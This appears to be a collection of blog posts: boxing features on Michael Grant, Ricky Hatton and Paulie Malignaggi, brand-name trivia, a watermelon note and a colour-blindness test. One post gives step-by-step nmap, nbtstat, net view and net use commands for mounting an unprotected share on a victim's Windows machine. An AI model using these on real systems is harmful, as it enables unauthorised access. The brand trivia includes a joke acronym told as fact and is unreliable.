TOMMY GALLAGHER OLD SCHOOLS MICHAEL GRANT

Tommy Gallagher, who has been part of the crooked-nose crew for as long as most care to remember, is an old school trainer going against the curriculum in a new school world. He has trained fighters for over 30 years – tough guys too – like Doug DeWitt, Vito Antuofermo and Merqui Sosa. Tonight, Gallagher leads heavyweight Michael Grant down the comeback trail, and if Gallagher’s hunch is right, he might one-day help Grant buckle a heavyweight title belt around his waist.

It doesn’t bother the gruff Gallagher, who is a Brooklyn, New York tough guy and a 1959 New York City Golden Gloves winner, that Grant has been away from the game for two years. Gallagher is no-nonsense in his approach to the fight racket and he figures that as long as Grant gets himself right in the head that everything else will take care of itself.

“I don’t care about what he looks like in the gym with sparrin’ or any of that crap! He has the ability,” barks Gallagher, who has the resemblance of Kojak with his shaved head. “Look, I’m from the old school. Mentally, Michael has to be in shape, get in shape and maintain shape. The most important thing is having confidence in his ability and showing up the night of the fight. When the night comes to fight it’s important that he’s there mentally to fight. Then it’s about adjustin’ in the ring to what’s in front of ya’.”

“Big” Michael Grant, at 6’7” tall and 250 pounds was once the prototype of the giant, athletically gifted, next generation of heavyweights. He was looked upon as the future of the heavyweight division and he was anointed the next great American heavyweight by many.

Grant was maneuvered to a record of 31-0 by managers Bill Cayton, adviser Craig Hamilton, and trainer Don Turner. He made several appearances on ESPN and HBO in the mid to late 1990’s and his rise through the ranks eventually culminated in a title shot against Lennox Lewis in April of 2000 at Madison Square Garden. Grant was paid in the neighborhood of $4 million for the Lewis fight, but he was totally destroyed in less than six minutes. After that, and a subsequent reincarnation with Teddy Atlas as his trainer, Grant continued on until he was knocked out in a less than inspiring performance against Dominick Guinn in June 2003 in Atlantic City. Grant returned again with Buddy McGirt at the helm and won three times but suddenly stopped fighting in June 2005.

Gallagher is realistic about the relationship with Grant who many see as a psychologically flawed heavyweight who crumbles when put under pressure. “Look, I’m old school,” emphasizes Gallagher again, “It matters who the individual is. He’s not doin’ it for the money and neither am I. I just took the job because I hate to see somebody who wants to do somethin’ not be able to do it. I’ve seen so many guys who don’t know when to say goodnight. He has a 2 or 3 year window. For Michael, it’s about his mental attitude and whether or not – or if – he comes to fight and let’s the dog out!”

Gallagher is also confident about working with Grant because, like everyone else, when he looks out on the horizon at the heavyweight landscape he sees a bunch of guys that hand the title back and forth to each other and there is no dominant force. “All the heavyweight champs out there now?” asks a disgusted Gallagher, “C’mon! Maskaev (the WBC titlist) is nearly 40.” When asked if Grant, who has 31 knockouts, can punch, Gallagher says he can. “Look, Michael punches as good as Savarese and Maskaev and maybe better.” Gallagher should know as he has worked with both in the past.

So how did an old school trainer from Brooklyn and a flawed heavyweight who has had a host of top trainers pair up? “We had a relationship in the past,” claims Gallagher. “He had an attorney, Jim Thomas, call me and he asked me to evaluate him. Look, Michael has everything in the world goin’ for him. He’s only 34 years old and I can’t see why he can’t be effective as he was. We’re training at Gleason’s in Brooklyn and I’m advising and training him. We’re talkin’ to two major people in New York. These are people that had Tokunbo Olajide, Lou Savarese and Simon Brown. They’re guys who put up whatever we need for money and they leave the boxing to me.”

The comeback is opponent tonight is Billy Zumbrun, a 34 year-old club fighter with a 21-8 record. “Zumbrun is a tough guy,” says a suddenly excited Gallagher. “He gave Riddick Bowe a good fight. If he gets by Zumbrun, he’s gonna’ fight June 29th in the Hamptons. No opponent yet. We haven’t even though about who the opponent might be. Do you know anybody?” he asks with a chuckle.

The fight is part of the ESPN2 Wednesday Night fight telecast and is taking place at an unusual locale, the upscale Cipriani’s Restaurant which is located on Wall Street in New York City. It’s a black-tie only affair that seems out of character for a guy like Gallagher and it’s a place the fight racket usually steers clear from. “I put the black tie event together,” proclaims a proud Gallagher. “I use my name because of ‘The Contender’ and I had a gym for 30 years. It brings a different audience to the table. You get a five-course meal, a goody bag, you get a chance to get dressed up and blow the stink off you.”

Then, talking all business like they do down on Wall Street, the 66 year-old trainer says, “We’re gonna’ do one of these a quarter.” When asked how the tickets were moving along the grizzled trainer turned New York businessman calmly stated, “Everything is goin’ good and we’re satisfied.”

So how is Gallagher going to teach Grant anything new especially since he was formerly trained by Don Turner, Teddy Atlas and Buddy McGirt? What is that Gallagher does that the others couldn’t?

“It’s very simple. It’s about toughness,” states Gallagher. “These kids now, they get a little insecure. Somebody tells them, ‘You should eat grass and drink distilled water’ and they’ll do it!” he squeaks incredulously. “These guys are full of shit! It’s a primitive game. It’s either you can fight or you can’t. It’s got too technical! There’s too much bullshit! The point is, it’s about being able to sustain the punishment you take. You got 4,000 special trainers now. You got a nutritionist, the weightliftin’…this and that! Feed these guys some meat! You give me a guy that says I wanna’ be a fighter - you give me that guy - and I give you the fighter of your life!”

Gallagher has obviously seen it all in a lifetime spent in the hardest game. He’s disappointed with what he sees these days and he wonders if boxing can make it. “The commissioners are ruinin’ this business,” he laments. “The UFC lets ‘em wear condoms on their hands. We have to wear 14-ounce gloves if you weigh over 135! They wanna’ think they’re doin’ somethin’. They’re doin’ nuthin’ but makin’ the fighters lose out. Now in the UFC fighting you can kick, you can bite and use your elbows. There may be a conspiracy to remove boxing and keep that Ultimate Bullshit out there! I’m not takin’ away from the athletes, but they allow them to do whatever they want and the boxers are scrutinized. What does that mean? Don’t get me started!”

Remember, Tommy Gallagher is old school and tonight he and Michael Grant are taking their first steps together.

When he asked where he could read this story I told him it would appear on the Internet. “What’s the Internet?” he asked. “I don’t have that.”

Old school indeed.

hacking netbios tutorial-understanding hacking basics

Here is some common hacking techniques used by some hacker out there..

This is for educational purpose only, this hack works with unpatched version of Windows 2000/NT/XP. (only works if the shared drive that has no password set by administrator)

Step 1:
-Get a IP (range) scanner.
-Scan the victim's ip on TCP/IP port 1XX (i put some XX in the port number so as di cya magaya for actual testing)

Most port scanners (nmap being the most prominent example) correctly
report ports as either open, closed or filtered.

"Mahirap" o hard to find some open port open these days because of firewall (sa patched windows)enable that will either "filtered or closed" ang port if u used ip scanner..

What is filtered or closed port?
Use an analogy of the cops coming to your place and looking for you. Having a filtered port is like them knocking on the door, and you saying "I'm not here". Having a closed port is like them knocking on the door, and no one answering. With a filtered port, you know there is an active system behind that port.
As far as from a security standpoint, to most hackers, when they see closed they don't think of a firewall, they think the service is just not running. When I see filtered, and its a port I want to get to, I instantly think, oh, ok, is there some backdoor I can punch thru the firewall? Can I DOS the firewall? Can I remotely administer the firewall?

Step 1.1
-Open a dos prompt
-Do this by going to start/run
-Type cmd
When you are already in DOS command prompt type
-NMAP -v -p 159 77.106.2.1-110 (example target ip range)
-when you got an open port proceed to step 2

Step 2
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:\windows>nbtstat -a 255.255.255.255

If you see this your in:

Step 3
type down:

c:\windows>net view \\255.255.255. 255

Step 4
type down:
c:\windows>net use x: \\255.255.255. 255\SYSVOL
(you can replace x: by anything letter you want but not your own drive
letters.)

Note:SYSVOL is the name of the shared harddrive.

If the command is successful we will get the confirmation.

The command was completed successfullly.

Bingo your inside the system now..

You can now execute any dos command e.g. x:\dir
(you will experience a lag in the system since it is a remote computer)

Now open windows explorer or just double click on the My Computer icon
on your desktop and you will see a new network drive X:\> . Now your are a
hacker.
This tutorial is warning for those who have old os like unpatched XP,NT,2000..always protect ur system..upgrade ur o system.. ..protect ur port specially port 139..Remember Hacking other`s comp is stealing..

World's greatest Brand name.Where does it come from?

Adobe - came from name of the river Adobe Creek that ran behind the
house of founder John Warnock.

Apache - It got its name because its founders got started by applying patches
to code written for NCSA's httpd daemon. The result was 'A PAtCHy'
server -- thus, the name Apache

Apple Computers - favorite fruit of founder Steve Jobs. He was three months
late in filing a name for the business, and he threatened to call his company Apple
Computers if the other colleagues didn't suggest a better name by 5 o'clock.

CISCO - its not an acronym but the short for San Francisco.

Google - the name started as a jokey boast about the amount of information
the search-engine would be able to search. It was originally named 'Googol',
a word for the number represented by 1 followed by 100 zeros. After founders,
Stanford grad students Sergey Brin and Larry Page presented their project to
an angel investor, they received a cheque made out to 'Google'

Hotmail - Founder Jack Smith got the idea of accessing e-mail via the web
from a computer anywhere in the world. When Sabeer Bhatia came up with
the business plan for the mail service, he tried all kinds of names ending in
'mail' and finally settled for hotmail as it included the letters "html" - the
programming language used to write web pages. It was initially referred to
as HoTMaiL with selective upper casing.

HP - Bill Hewlett and Dave Packard tossed a coin to decide whether the
company they founded would be called Hewlett-Packard or Packard-Hewlett.

Intel - Bob Noyce and Gordon Moore wanted to name their new company
'Moore Noyce' but that was already trademarked by a hotel chain, so they
had to settle for an acronym of INTegrated ELectronics.

Lotus (Notes) - Mitch Kapor got the name for his company from 'The Lotus
Position' or 'Padmasana'. Kapor used to be a teacher of Transcendental
Meditation (by Maharishi Mahesh Yogi).

Microsoft - coined by Bill Gates to represent the company that was devoted to
MICROcomputer SOFTware. Originally christened Micro-Soft, the '-' was
removed later on.

Motorola - Founder Paul Galvin came up with this name when his company
started manufacturing radios for cars. The popular radio company at the time
was called Victrola.

ORACLE - Larry Ellison and Bob Oats were working on a consulting project
for the CIA (Central Intelligence Agency). The code name for the project was
called Oracle (acronym for: One Real Asshole Called Larry Ellison)

Red Hat - Company founder Marc Ewing was given the Cornell lacrosse team
cap (with red and white stripes) while at college by his grandfather. He lost it and
had to search for it desperately. The manual of the beta version of Red Hat Linux
had an appeal to readers to return his Red Hat if found by anyone !

SAP - "Systems, Applications, Products in Data Processing", formed by 4 ex-IBM
employees who used to work in the 'Systems/Applications/Projects"

SUN - founded by 4 Stanford University buddies, SUN is the acronym for Stanford
University Network.

Xerox - The inventor, Chestor Carlson, named his product trying to say 'dry' (as
it was dry copying, markedly different from the then prevailing wet copying).
The Greek root 'xer' means dry.

Yahoo! - the word was invented by Jonathan Swift and used in his book 'Gulliver's
Travels'. It represents a person who is repulsive in appearance and action and is
barely human. Yahoo! founders Jerry Yang and David Filo selected the name
because they considered themselves yahoos.

THIS HITMAN WEARS BABY BLUE

Nobody told Ricky “The Hitman” Hatton that real hitmen are supposed to wear black.

And even if they had, it probably wouldn’t have made any difference. Hatton, who is getting ready to face the tough as nails Mexican Jose Luis Castillo on Saturday night in Las Vegas, has made a career of doing things his own way, knocking guys out – and wearing baby blue colored trunks.

If the diminutive Hatton was as good with his feet as he is with his fists he would have likely become a professional soccer player. They call it “football where he comes from and he loves his Manchester City football club. So much so that he enters the ring to the tune of their theme song, “Blue Moon” and their colors are his color – baby blue.

He’s a small town boy from the countryside of England who still lives a stones throw from his parents’ home and he arrived in Las Vegas last week ahead of the big fight with Castillo. “This is where all the biggies fought,” said a beaming Hatton. “When I was growing up I watched Hagler and Hearns and Leonard and me hero Roberto Duran fight all those great fights in Vegas. I want to be a part of that.”

His name is illuminated in neon lights along the famous Vegas strip and as a young lad flailing away on the bags in a seedy English gym he could only dream that he would one day find himself here.

The temperatures of this Las Vegas spring have been blistering and the mercury has been routinely pushed into the triple digits. Surrounded by opulent casinos, palm trees and scantily clad suntanned bodies, Hatton, who is Englishman through and through, looks a little out of place

When he left England under partly cloudy skies the temperature was only in the mid-sixties. He has a youthful face, opaque skin and a positively zany sense of humor. He told The Guardian that it has been so hot in Sin City, “That I saw a tree chasing a dog the other day.”

But Ricky Hatton can see past the mirage. He’s running with a very real 10-year unbeaten streak, he’s knocked out and likely retired the great Kostya Tszyu, he’s won world titles at 140 and 147 pounds and he possesses a sparkling record of 42-0 (30) KO’s. With Floyd Mayweather, Jr. begging off to retirement, many think that Hatton, who is headlining his third straight fight here in America, could make a strong case for being the top pound-for-pound fighter in the world if he can make it by Castillo.

“I’m looking forward to fighting Castillo,” said Hatton. “That’s on me mind now. Styles make fights in the boxing game and this will be a good one because of our styles. You like a chess match watch De La Hoya and Floyd Mayweather. You like fighters who come to fight and will knock the shit out each other then you watch us two.”

Jose Luis Castillo is another story entirely, at least from a climate standpoint . He turned pro as a 16 year-old boy and his early fights took place against grown men in the dusty rings that dot the Mexican countryside. Castillo is used to hot weather having been born in Mexicali, Mexico, and as HBO’s unofficial fight judge Harold Lederman once said of the oppressive heat in Mexicali, “That’s where the devil goes on vacation.”

A veteran of 63 professional fights, Castillo made his name as a 135-pound lightweight and he was good enough to give Floyd Mayweather, Jr. fits for 24 rounds over two fights. Many still think it was Castillo that deserved the decision in the first fight.

Then of course there was his epic first fight with the recently deceased Diego “Chico” Corrales that took place in Las Vegas in May 2005. It was, quite possibly, one of the greatest fights in boxing history and it was a fight that was savage as it was beautiful. Although Castillo lost that fight in the tenth round he knocked out Corrales in the rematch and Castillo’s prowess is spoken about now in revered terms. His name will forever be linked to Corrales’ as much as Cain to Abel and David to Goliath.

At age 33, Castillo’s most significant problems have been in trying to make weight. He abandoned the lightweights, where he won the WBC title twice, to travel five pounds north to 140 pounds. For this fight with Hatton, he says he is ready.

Last week, after a rigorous training session, Castillo told the Sunday Times of London that, “I like to suffer. This prepares me for war, which is what it will be when I face Ricky Hatton. I have the heart of a lion. This fight will end in a small death for Hatton.” Castillo should know a lot about punishment and small deaths. For years he was the great Julio Cesar Chavez’ main understudy.

Nobody understands the implications of looking impressive in the fight against Castillo better than Hatton does. His first headline fight in America took place in May 2006 in Boston against southpaw Luis Collazo at 147 pounds. Hatton barely squeaked by Collazo and he was hurt late in the fight. His next fight, with Juan Urango in January 2007, was a quiet performance for Hatton and again he failed to impress American boxing fans in winning another decision. The fans here in the States had heard about the knockout puncher with the boyish zeal and the spring in his step and those that had seen him fight said he reminded them of Roberto Duran. But on U.S. soil – Hatton has failed to live up to his lofty expectations.

“I was up at welterweight, and then I moved down to light welterweight,” says Hatton in his defense. “I had a couple of southpaw opponents. You know, Collazo is a big southpaw and Urango, southpaw again. Collazo threw so many punches, he didn’t give you much room. He didn’t give you as much as an opening for a spoon shot really. So, you know, really tricky awkward styles. This is more my kind of fight, I think, with Castillo it will be a similar to the Tszyu fight. Castillo holds his ground a little bit more, so it really is my type of fight. And I feel that the achievements have been a little better than the performances in my last two fights. I know I’ve got a lot better performances in me.”

Hatton says he is now at his correct fighting weight after the one fight flirtation with 147 pounds and he’s used to fighting on the road now. He and his team arrived in Las Vegas 16 days before the fight to better acclimate to the time change and the weather. Hatton claims he’s whittled his skills to a fine point. “I’ve been walking around snarling for the last three weeks,” says Hatton. “I’ve not been like that for the last couple of fights.”

Hatton has also had his own problems making weight but he says that for this fight it hasn’t been a problem. “I’ve trained for 12 hard rounds,” he said. “I’ve trained for just winning the fight the skin of my teeth. That’s the way you’ve always got to look at every fight, every time you step through the ring. That’s the way you’ve got a lock on it. But I mean, no, I mean I’ll be going out there for the knock out, and I think there’s a great chance that I can force that. But, you know, I’ve trained for 12 rounds of pain, really.”

He’s a hero in England and now he’s looking to make himself a hero in America. When asked about the fans that are making the trip from England to support him, Hatton was appreciative. “Yes. I expect three times more to be there again. You know, I defy any fellow, any person in boxing to draw out a bigger crowd than me, at the minute, especially in England. I reckon if I was to go back to England for a homecoming, you know, to get an open air stadium now, what I’ve achieved since I fought Kostya Tszyu, I reckon, we could get 50, 60, 70,000 as daft as it sounds. But I believe there’s near 10,000 Brits who have purchased tickets in England that are coming over to watch the fight, which is over half the venue. So that’s absolutely fantastic. You know, to sell that type of numbers in your hometown would be a massive achievement, but to do it halfway across the world, you know, is actually incredible. It’s an exciting week and I won’t be letting them down.”

And just for emphasis, Ricky Hatton will be wearing baby blue.

The benefits of Watermelon-a.ka. "pakwan"

Watermelon has always been a good source of vitamins A and C, and provides potassium and fiber. But now consumers have even more reasons to enjoy a sweet fruit.

Scientists indicate that watermelon contains high levels of lycopene-an antioxidant that may help the body fight cancer and prevent disease. Found only in select fruits and vegetables, lycopene is very effective at trapping cancer-promoting agents called free-oxygen radicals.

A study conducted by Harvard University found that men who ate lycopene-rich diets of tomatoes and tomato products had a much lower risk of developing certain cancers, especially prostrate cancer.

Lycopene is found only in red watermelon varieties. In fact, it gives watermelon its red colour, thus, the redder the watermelon, the more lycopene it contains.

We have always known that watermelon offers a number of benefits .But as lycopene continues to emerge as a possible important, effective agent in disease prevention.

In addition to lycopene, watermelon offers a host of other health benefits. It is fat-free, yet delivers 100 percent on the critical energy component found in functional foods.

THIS MAGIC MAN CAN CHANGE MINDS

The first time I laid eyes on Paulie “The Magic Man” Malignaggi was in Atlantic City on a cool November night nearly five years ago. It was the night before Arturo Gatti and Micky Ward took a second turn tearing the pages from each other’s book.

I was waiting in line at Bally’s to see a fight card that featured future lightweight champ Juan Diaz against Arthur Cruz and Malignaggi blew by me with a small entourage wearing enough bling to light up the Jersey shore.

The first thing that struck me was that he didn’t look much like a fighter. He looked far too dainty and frail and I figured him for a pretender and not a contender. To me, he seemed more concerned with his appearance and place in line than just about anything else.

He was wearing his customary headband, both of his ears were pierced, his eyebrows were impeccably plucked and he was wearing a pair of sunglasses at night. His hair was standing straight up and varnished with enough hairspray and gel to make Homer Formby proud.

Malignaggi was 11-0 (4) KO’s at the time and the next night he would have a fight of his own on the Gatti vs. Ward undercard. It was Malignaggi’s 22nd birthday and he fought a spitfire and a helluva tough customer named Paul Delgado and Malignaggi struggled to win an eight round split decision. Watching him in the fight against Delgado who was 5-1-1 (2) KO’s, I pretty much made up my mind that this Malignaggi kid just didn’t have it. I scored the fight a draw.

Although he was flashy, fast and mildly entertaining, I just didn’t see how he was going to hack it in what the great fight writer Hugh McIllvaney called “The Hardest Game”.

Paulie Malignaggi reminded me of a poor man’s version of Hector Camacho and for the better part of the next four years I kept track of his progress but he never excited me too much. There were the horrible hand problems that he had, and for me, it all came back to the first impression that I had of him that this was a kid that just wasn’t built for the fight racket. He was a little too fragile.

My mind was made up.

The years ticked by and it seemed like Paulie Malignaggi just wasn’t ever going to get his big break and make the leap from a brash, undefeated kid to a respected, big-time prizefighter. I watched with little interest as he fought on small cards in places like Hampton Beach, New Hampshire, Jimmy’s Bronx Café and at Harrah’s in Laughlin, Nevada.

His promoter from the beginning has been Lou DiBella and while I figured Lou had done an admirable job with the kid I just didn’t see that he had championship material on his hands. While Malignaggi certainly had skills, I was always left questioning his heart and guts for the fight game largely based on that first impression that I had of him from that night in Atlantic City.

Then in June of 2006, Malignaggi was matched against Miguel Cotto, the tough as nails Puerto Rican destroyer. The fight took place at Madison Square Garden in New York and it was for Cotto’s WBO Jr. Welterweight title. I figured Cotto would murder the kid and that Malignaggi’s backers were finally going to cash out on him by throwing him in way over his head in a title fight with Cotto.

Early on it looked like Cotto was going to make short work of Malignaggi and he had him down on the deck in the second round. Everything I ever believed about Paulie Malignaggi was coming true before my eyes and I figured it wouldn’t be long before he was knocked out of the fight - and likely out of boxing.

Then something magical happened.

The “Magic Man” pulled a rabbit out of his hat and said “abracadabra”. Paulie Malignaggi battled back against Cotto. He showed as much heart and guts as I have ever seen any fighter ever display. The kid had a broken cheekbone, his face was grotesquely swollen but he stood in there with Cotto, in the lion’s den, and he made the fight closer than anybody ever thought he could. He went punch-for-punch and stood in there when he could have quit at any time.

On that night, Paulie “The Magic Man” Malignaggi magically changed my mind.

I don’t often root for a fighter to win. But on Saturday night when Paulie Malignaggi gets his second title shot against IBF Jr. Welterweight titlist Lovemore N’dou at the Mohegan Sun Casino in Uncasville, Connecticut, I’ll be watching and a part of me will be hoping that he wins.

Despite appearances, this kid’s a fighter through and through, and if you give Paulie Malignaggi a chance to work his magic – he might just change your mind too.

TEST FOR COLOR BLINDNESS

What numbers do you see revealed in the patterns of dots below?

I am color blind, as is about 12 - 20 percent (depending on whose figures you want to believe) of the white, male population and a tiny fraction of the female population. Most of these circles are nothing but spots to me. Below are the correct answers to what a person with normal color vision would see - and what I see (and most people with Red-Green color blindness). When you see what we can't see, you may understand why it's so tough to find the right sox and why we like bright colors, which are often identifiable.

Normal Color Vision

Red-Green Color Blind

Left Right
Left Right
Top 25 29 Top 25 Spots
Middle 45 56 Middle Spots 56
Bottom 6 8 Bottom Spots Spots

Another interesting color blindness test is below

The test to the left is simpler.
The individual with normal color vision will see a 5 revealed in the dot pattern.
An individual with Red/Green (the most common) color blindness will see a 2 revealed in the dots.
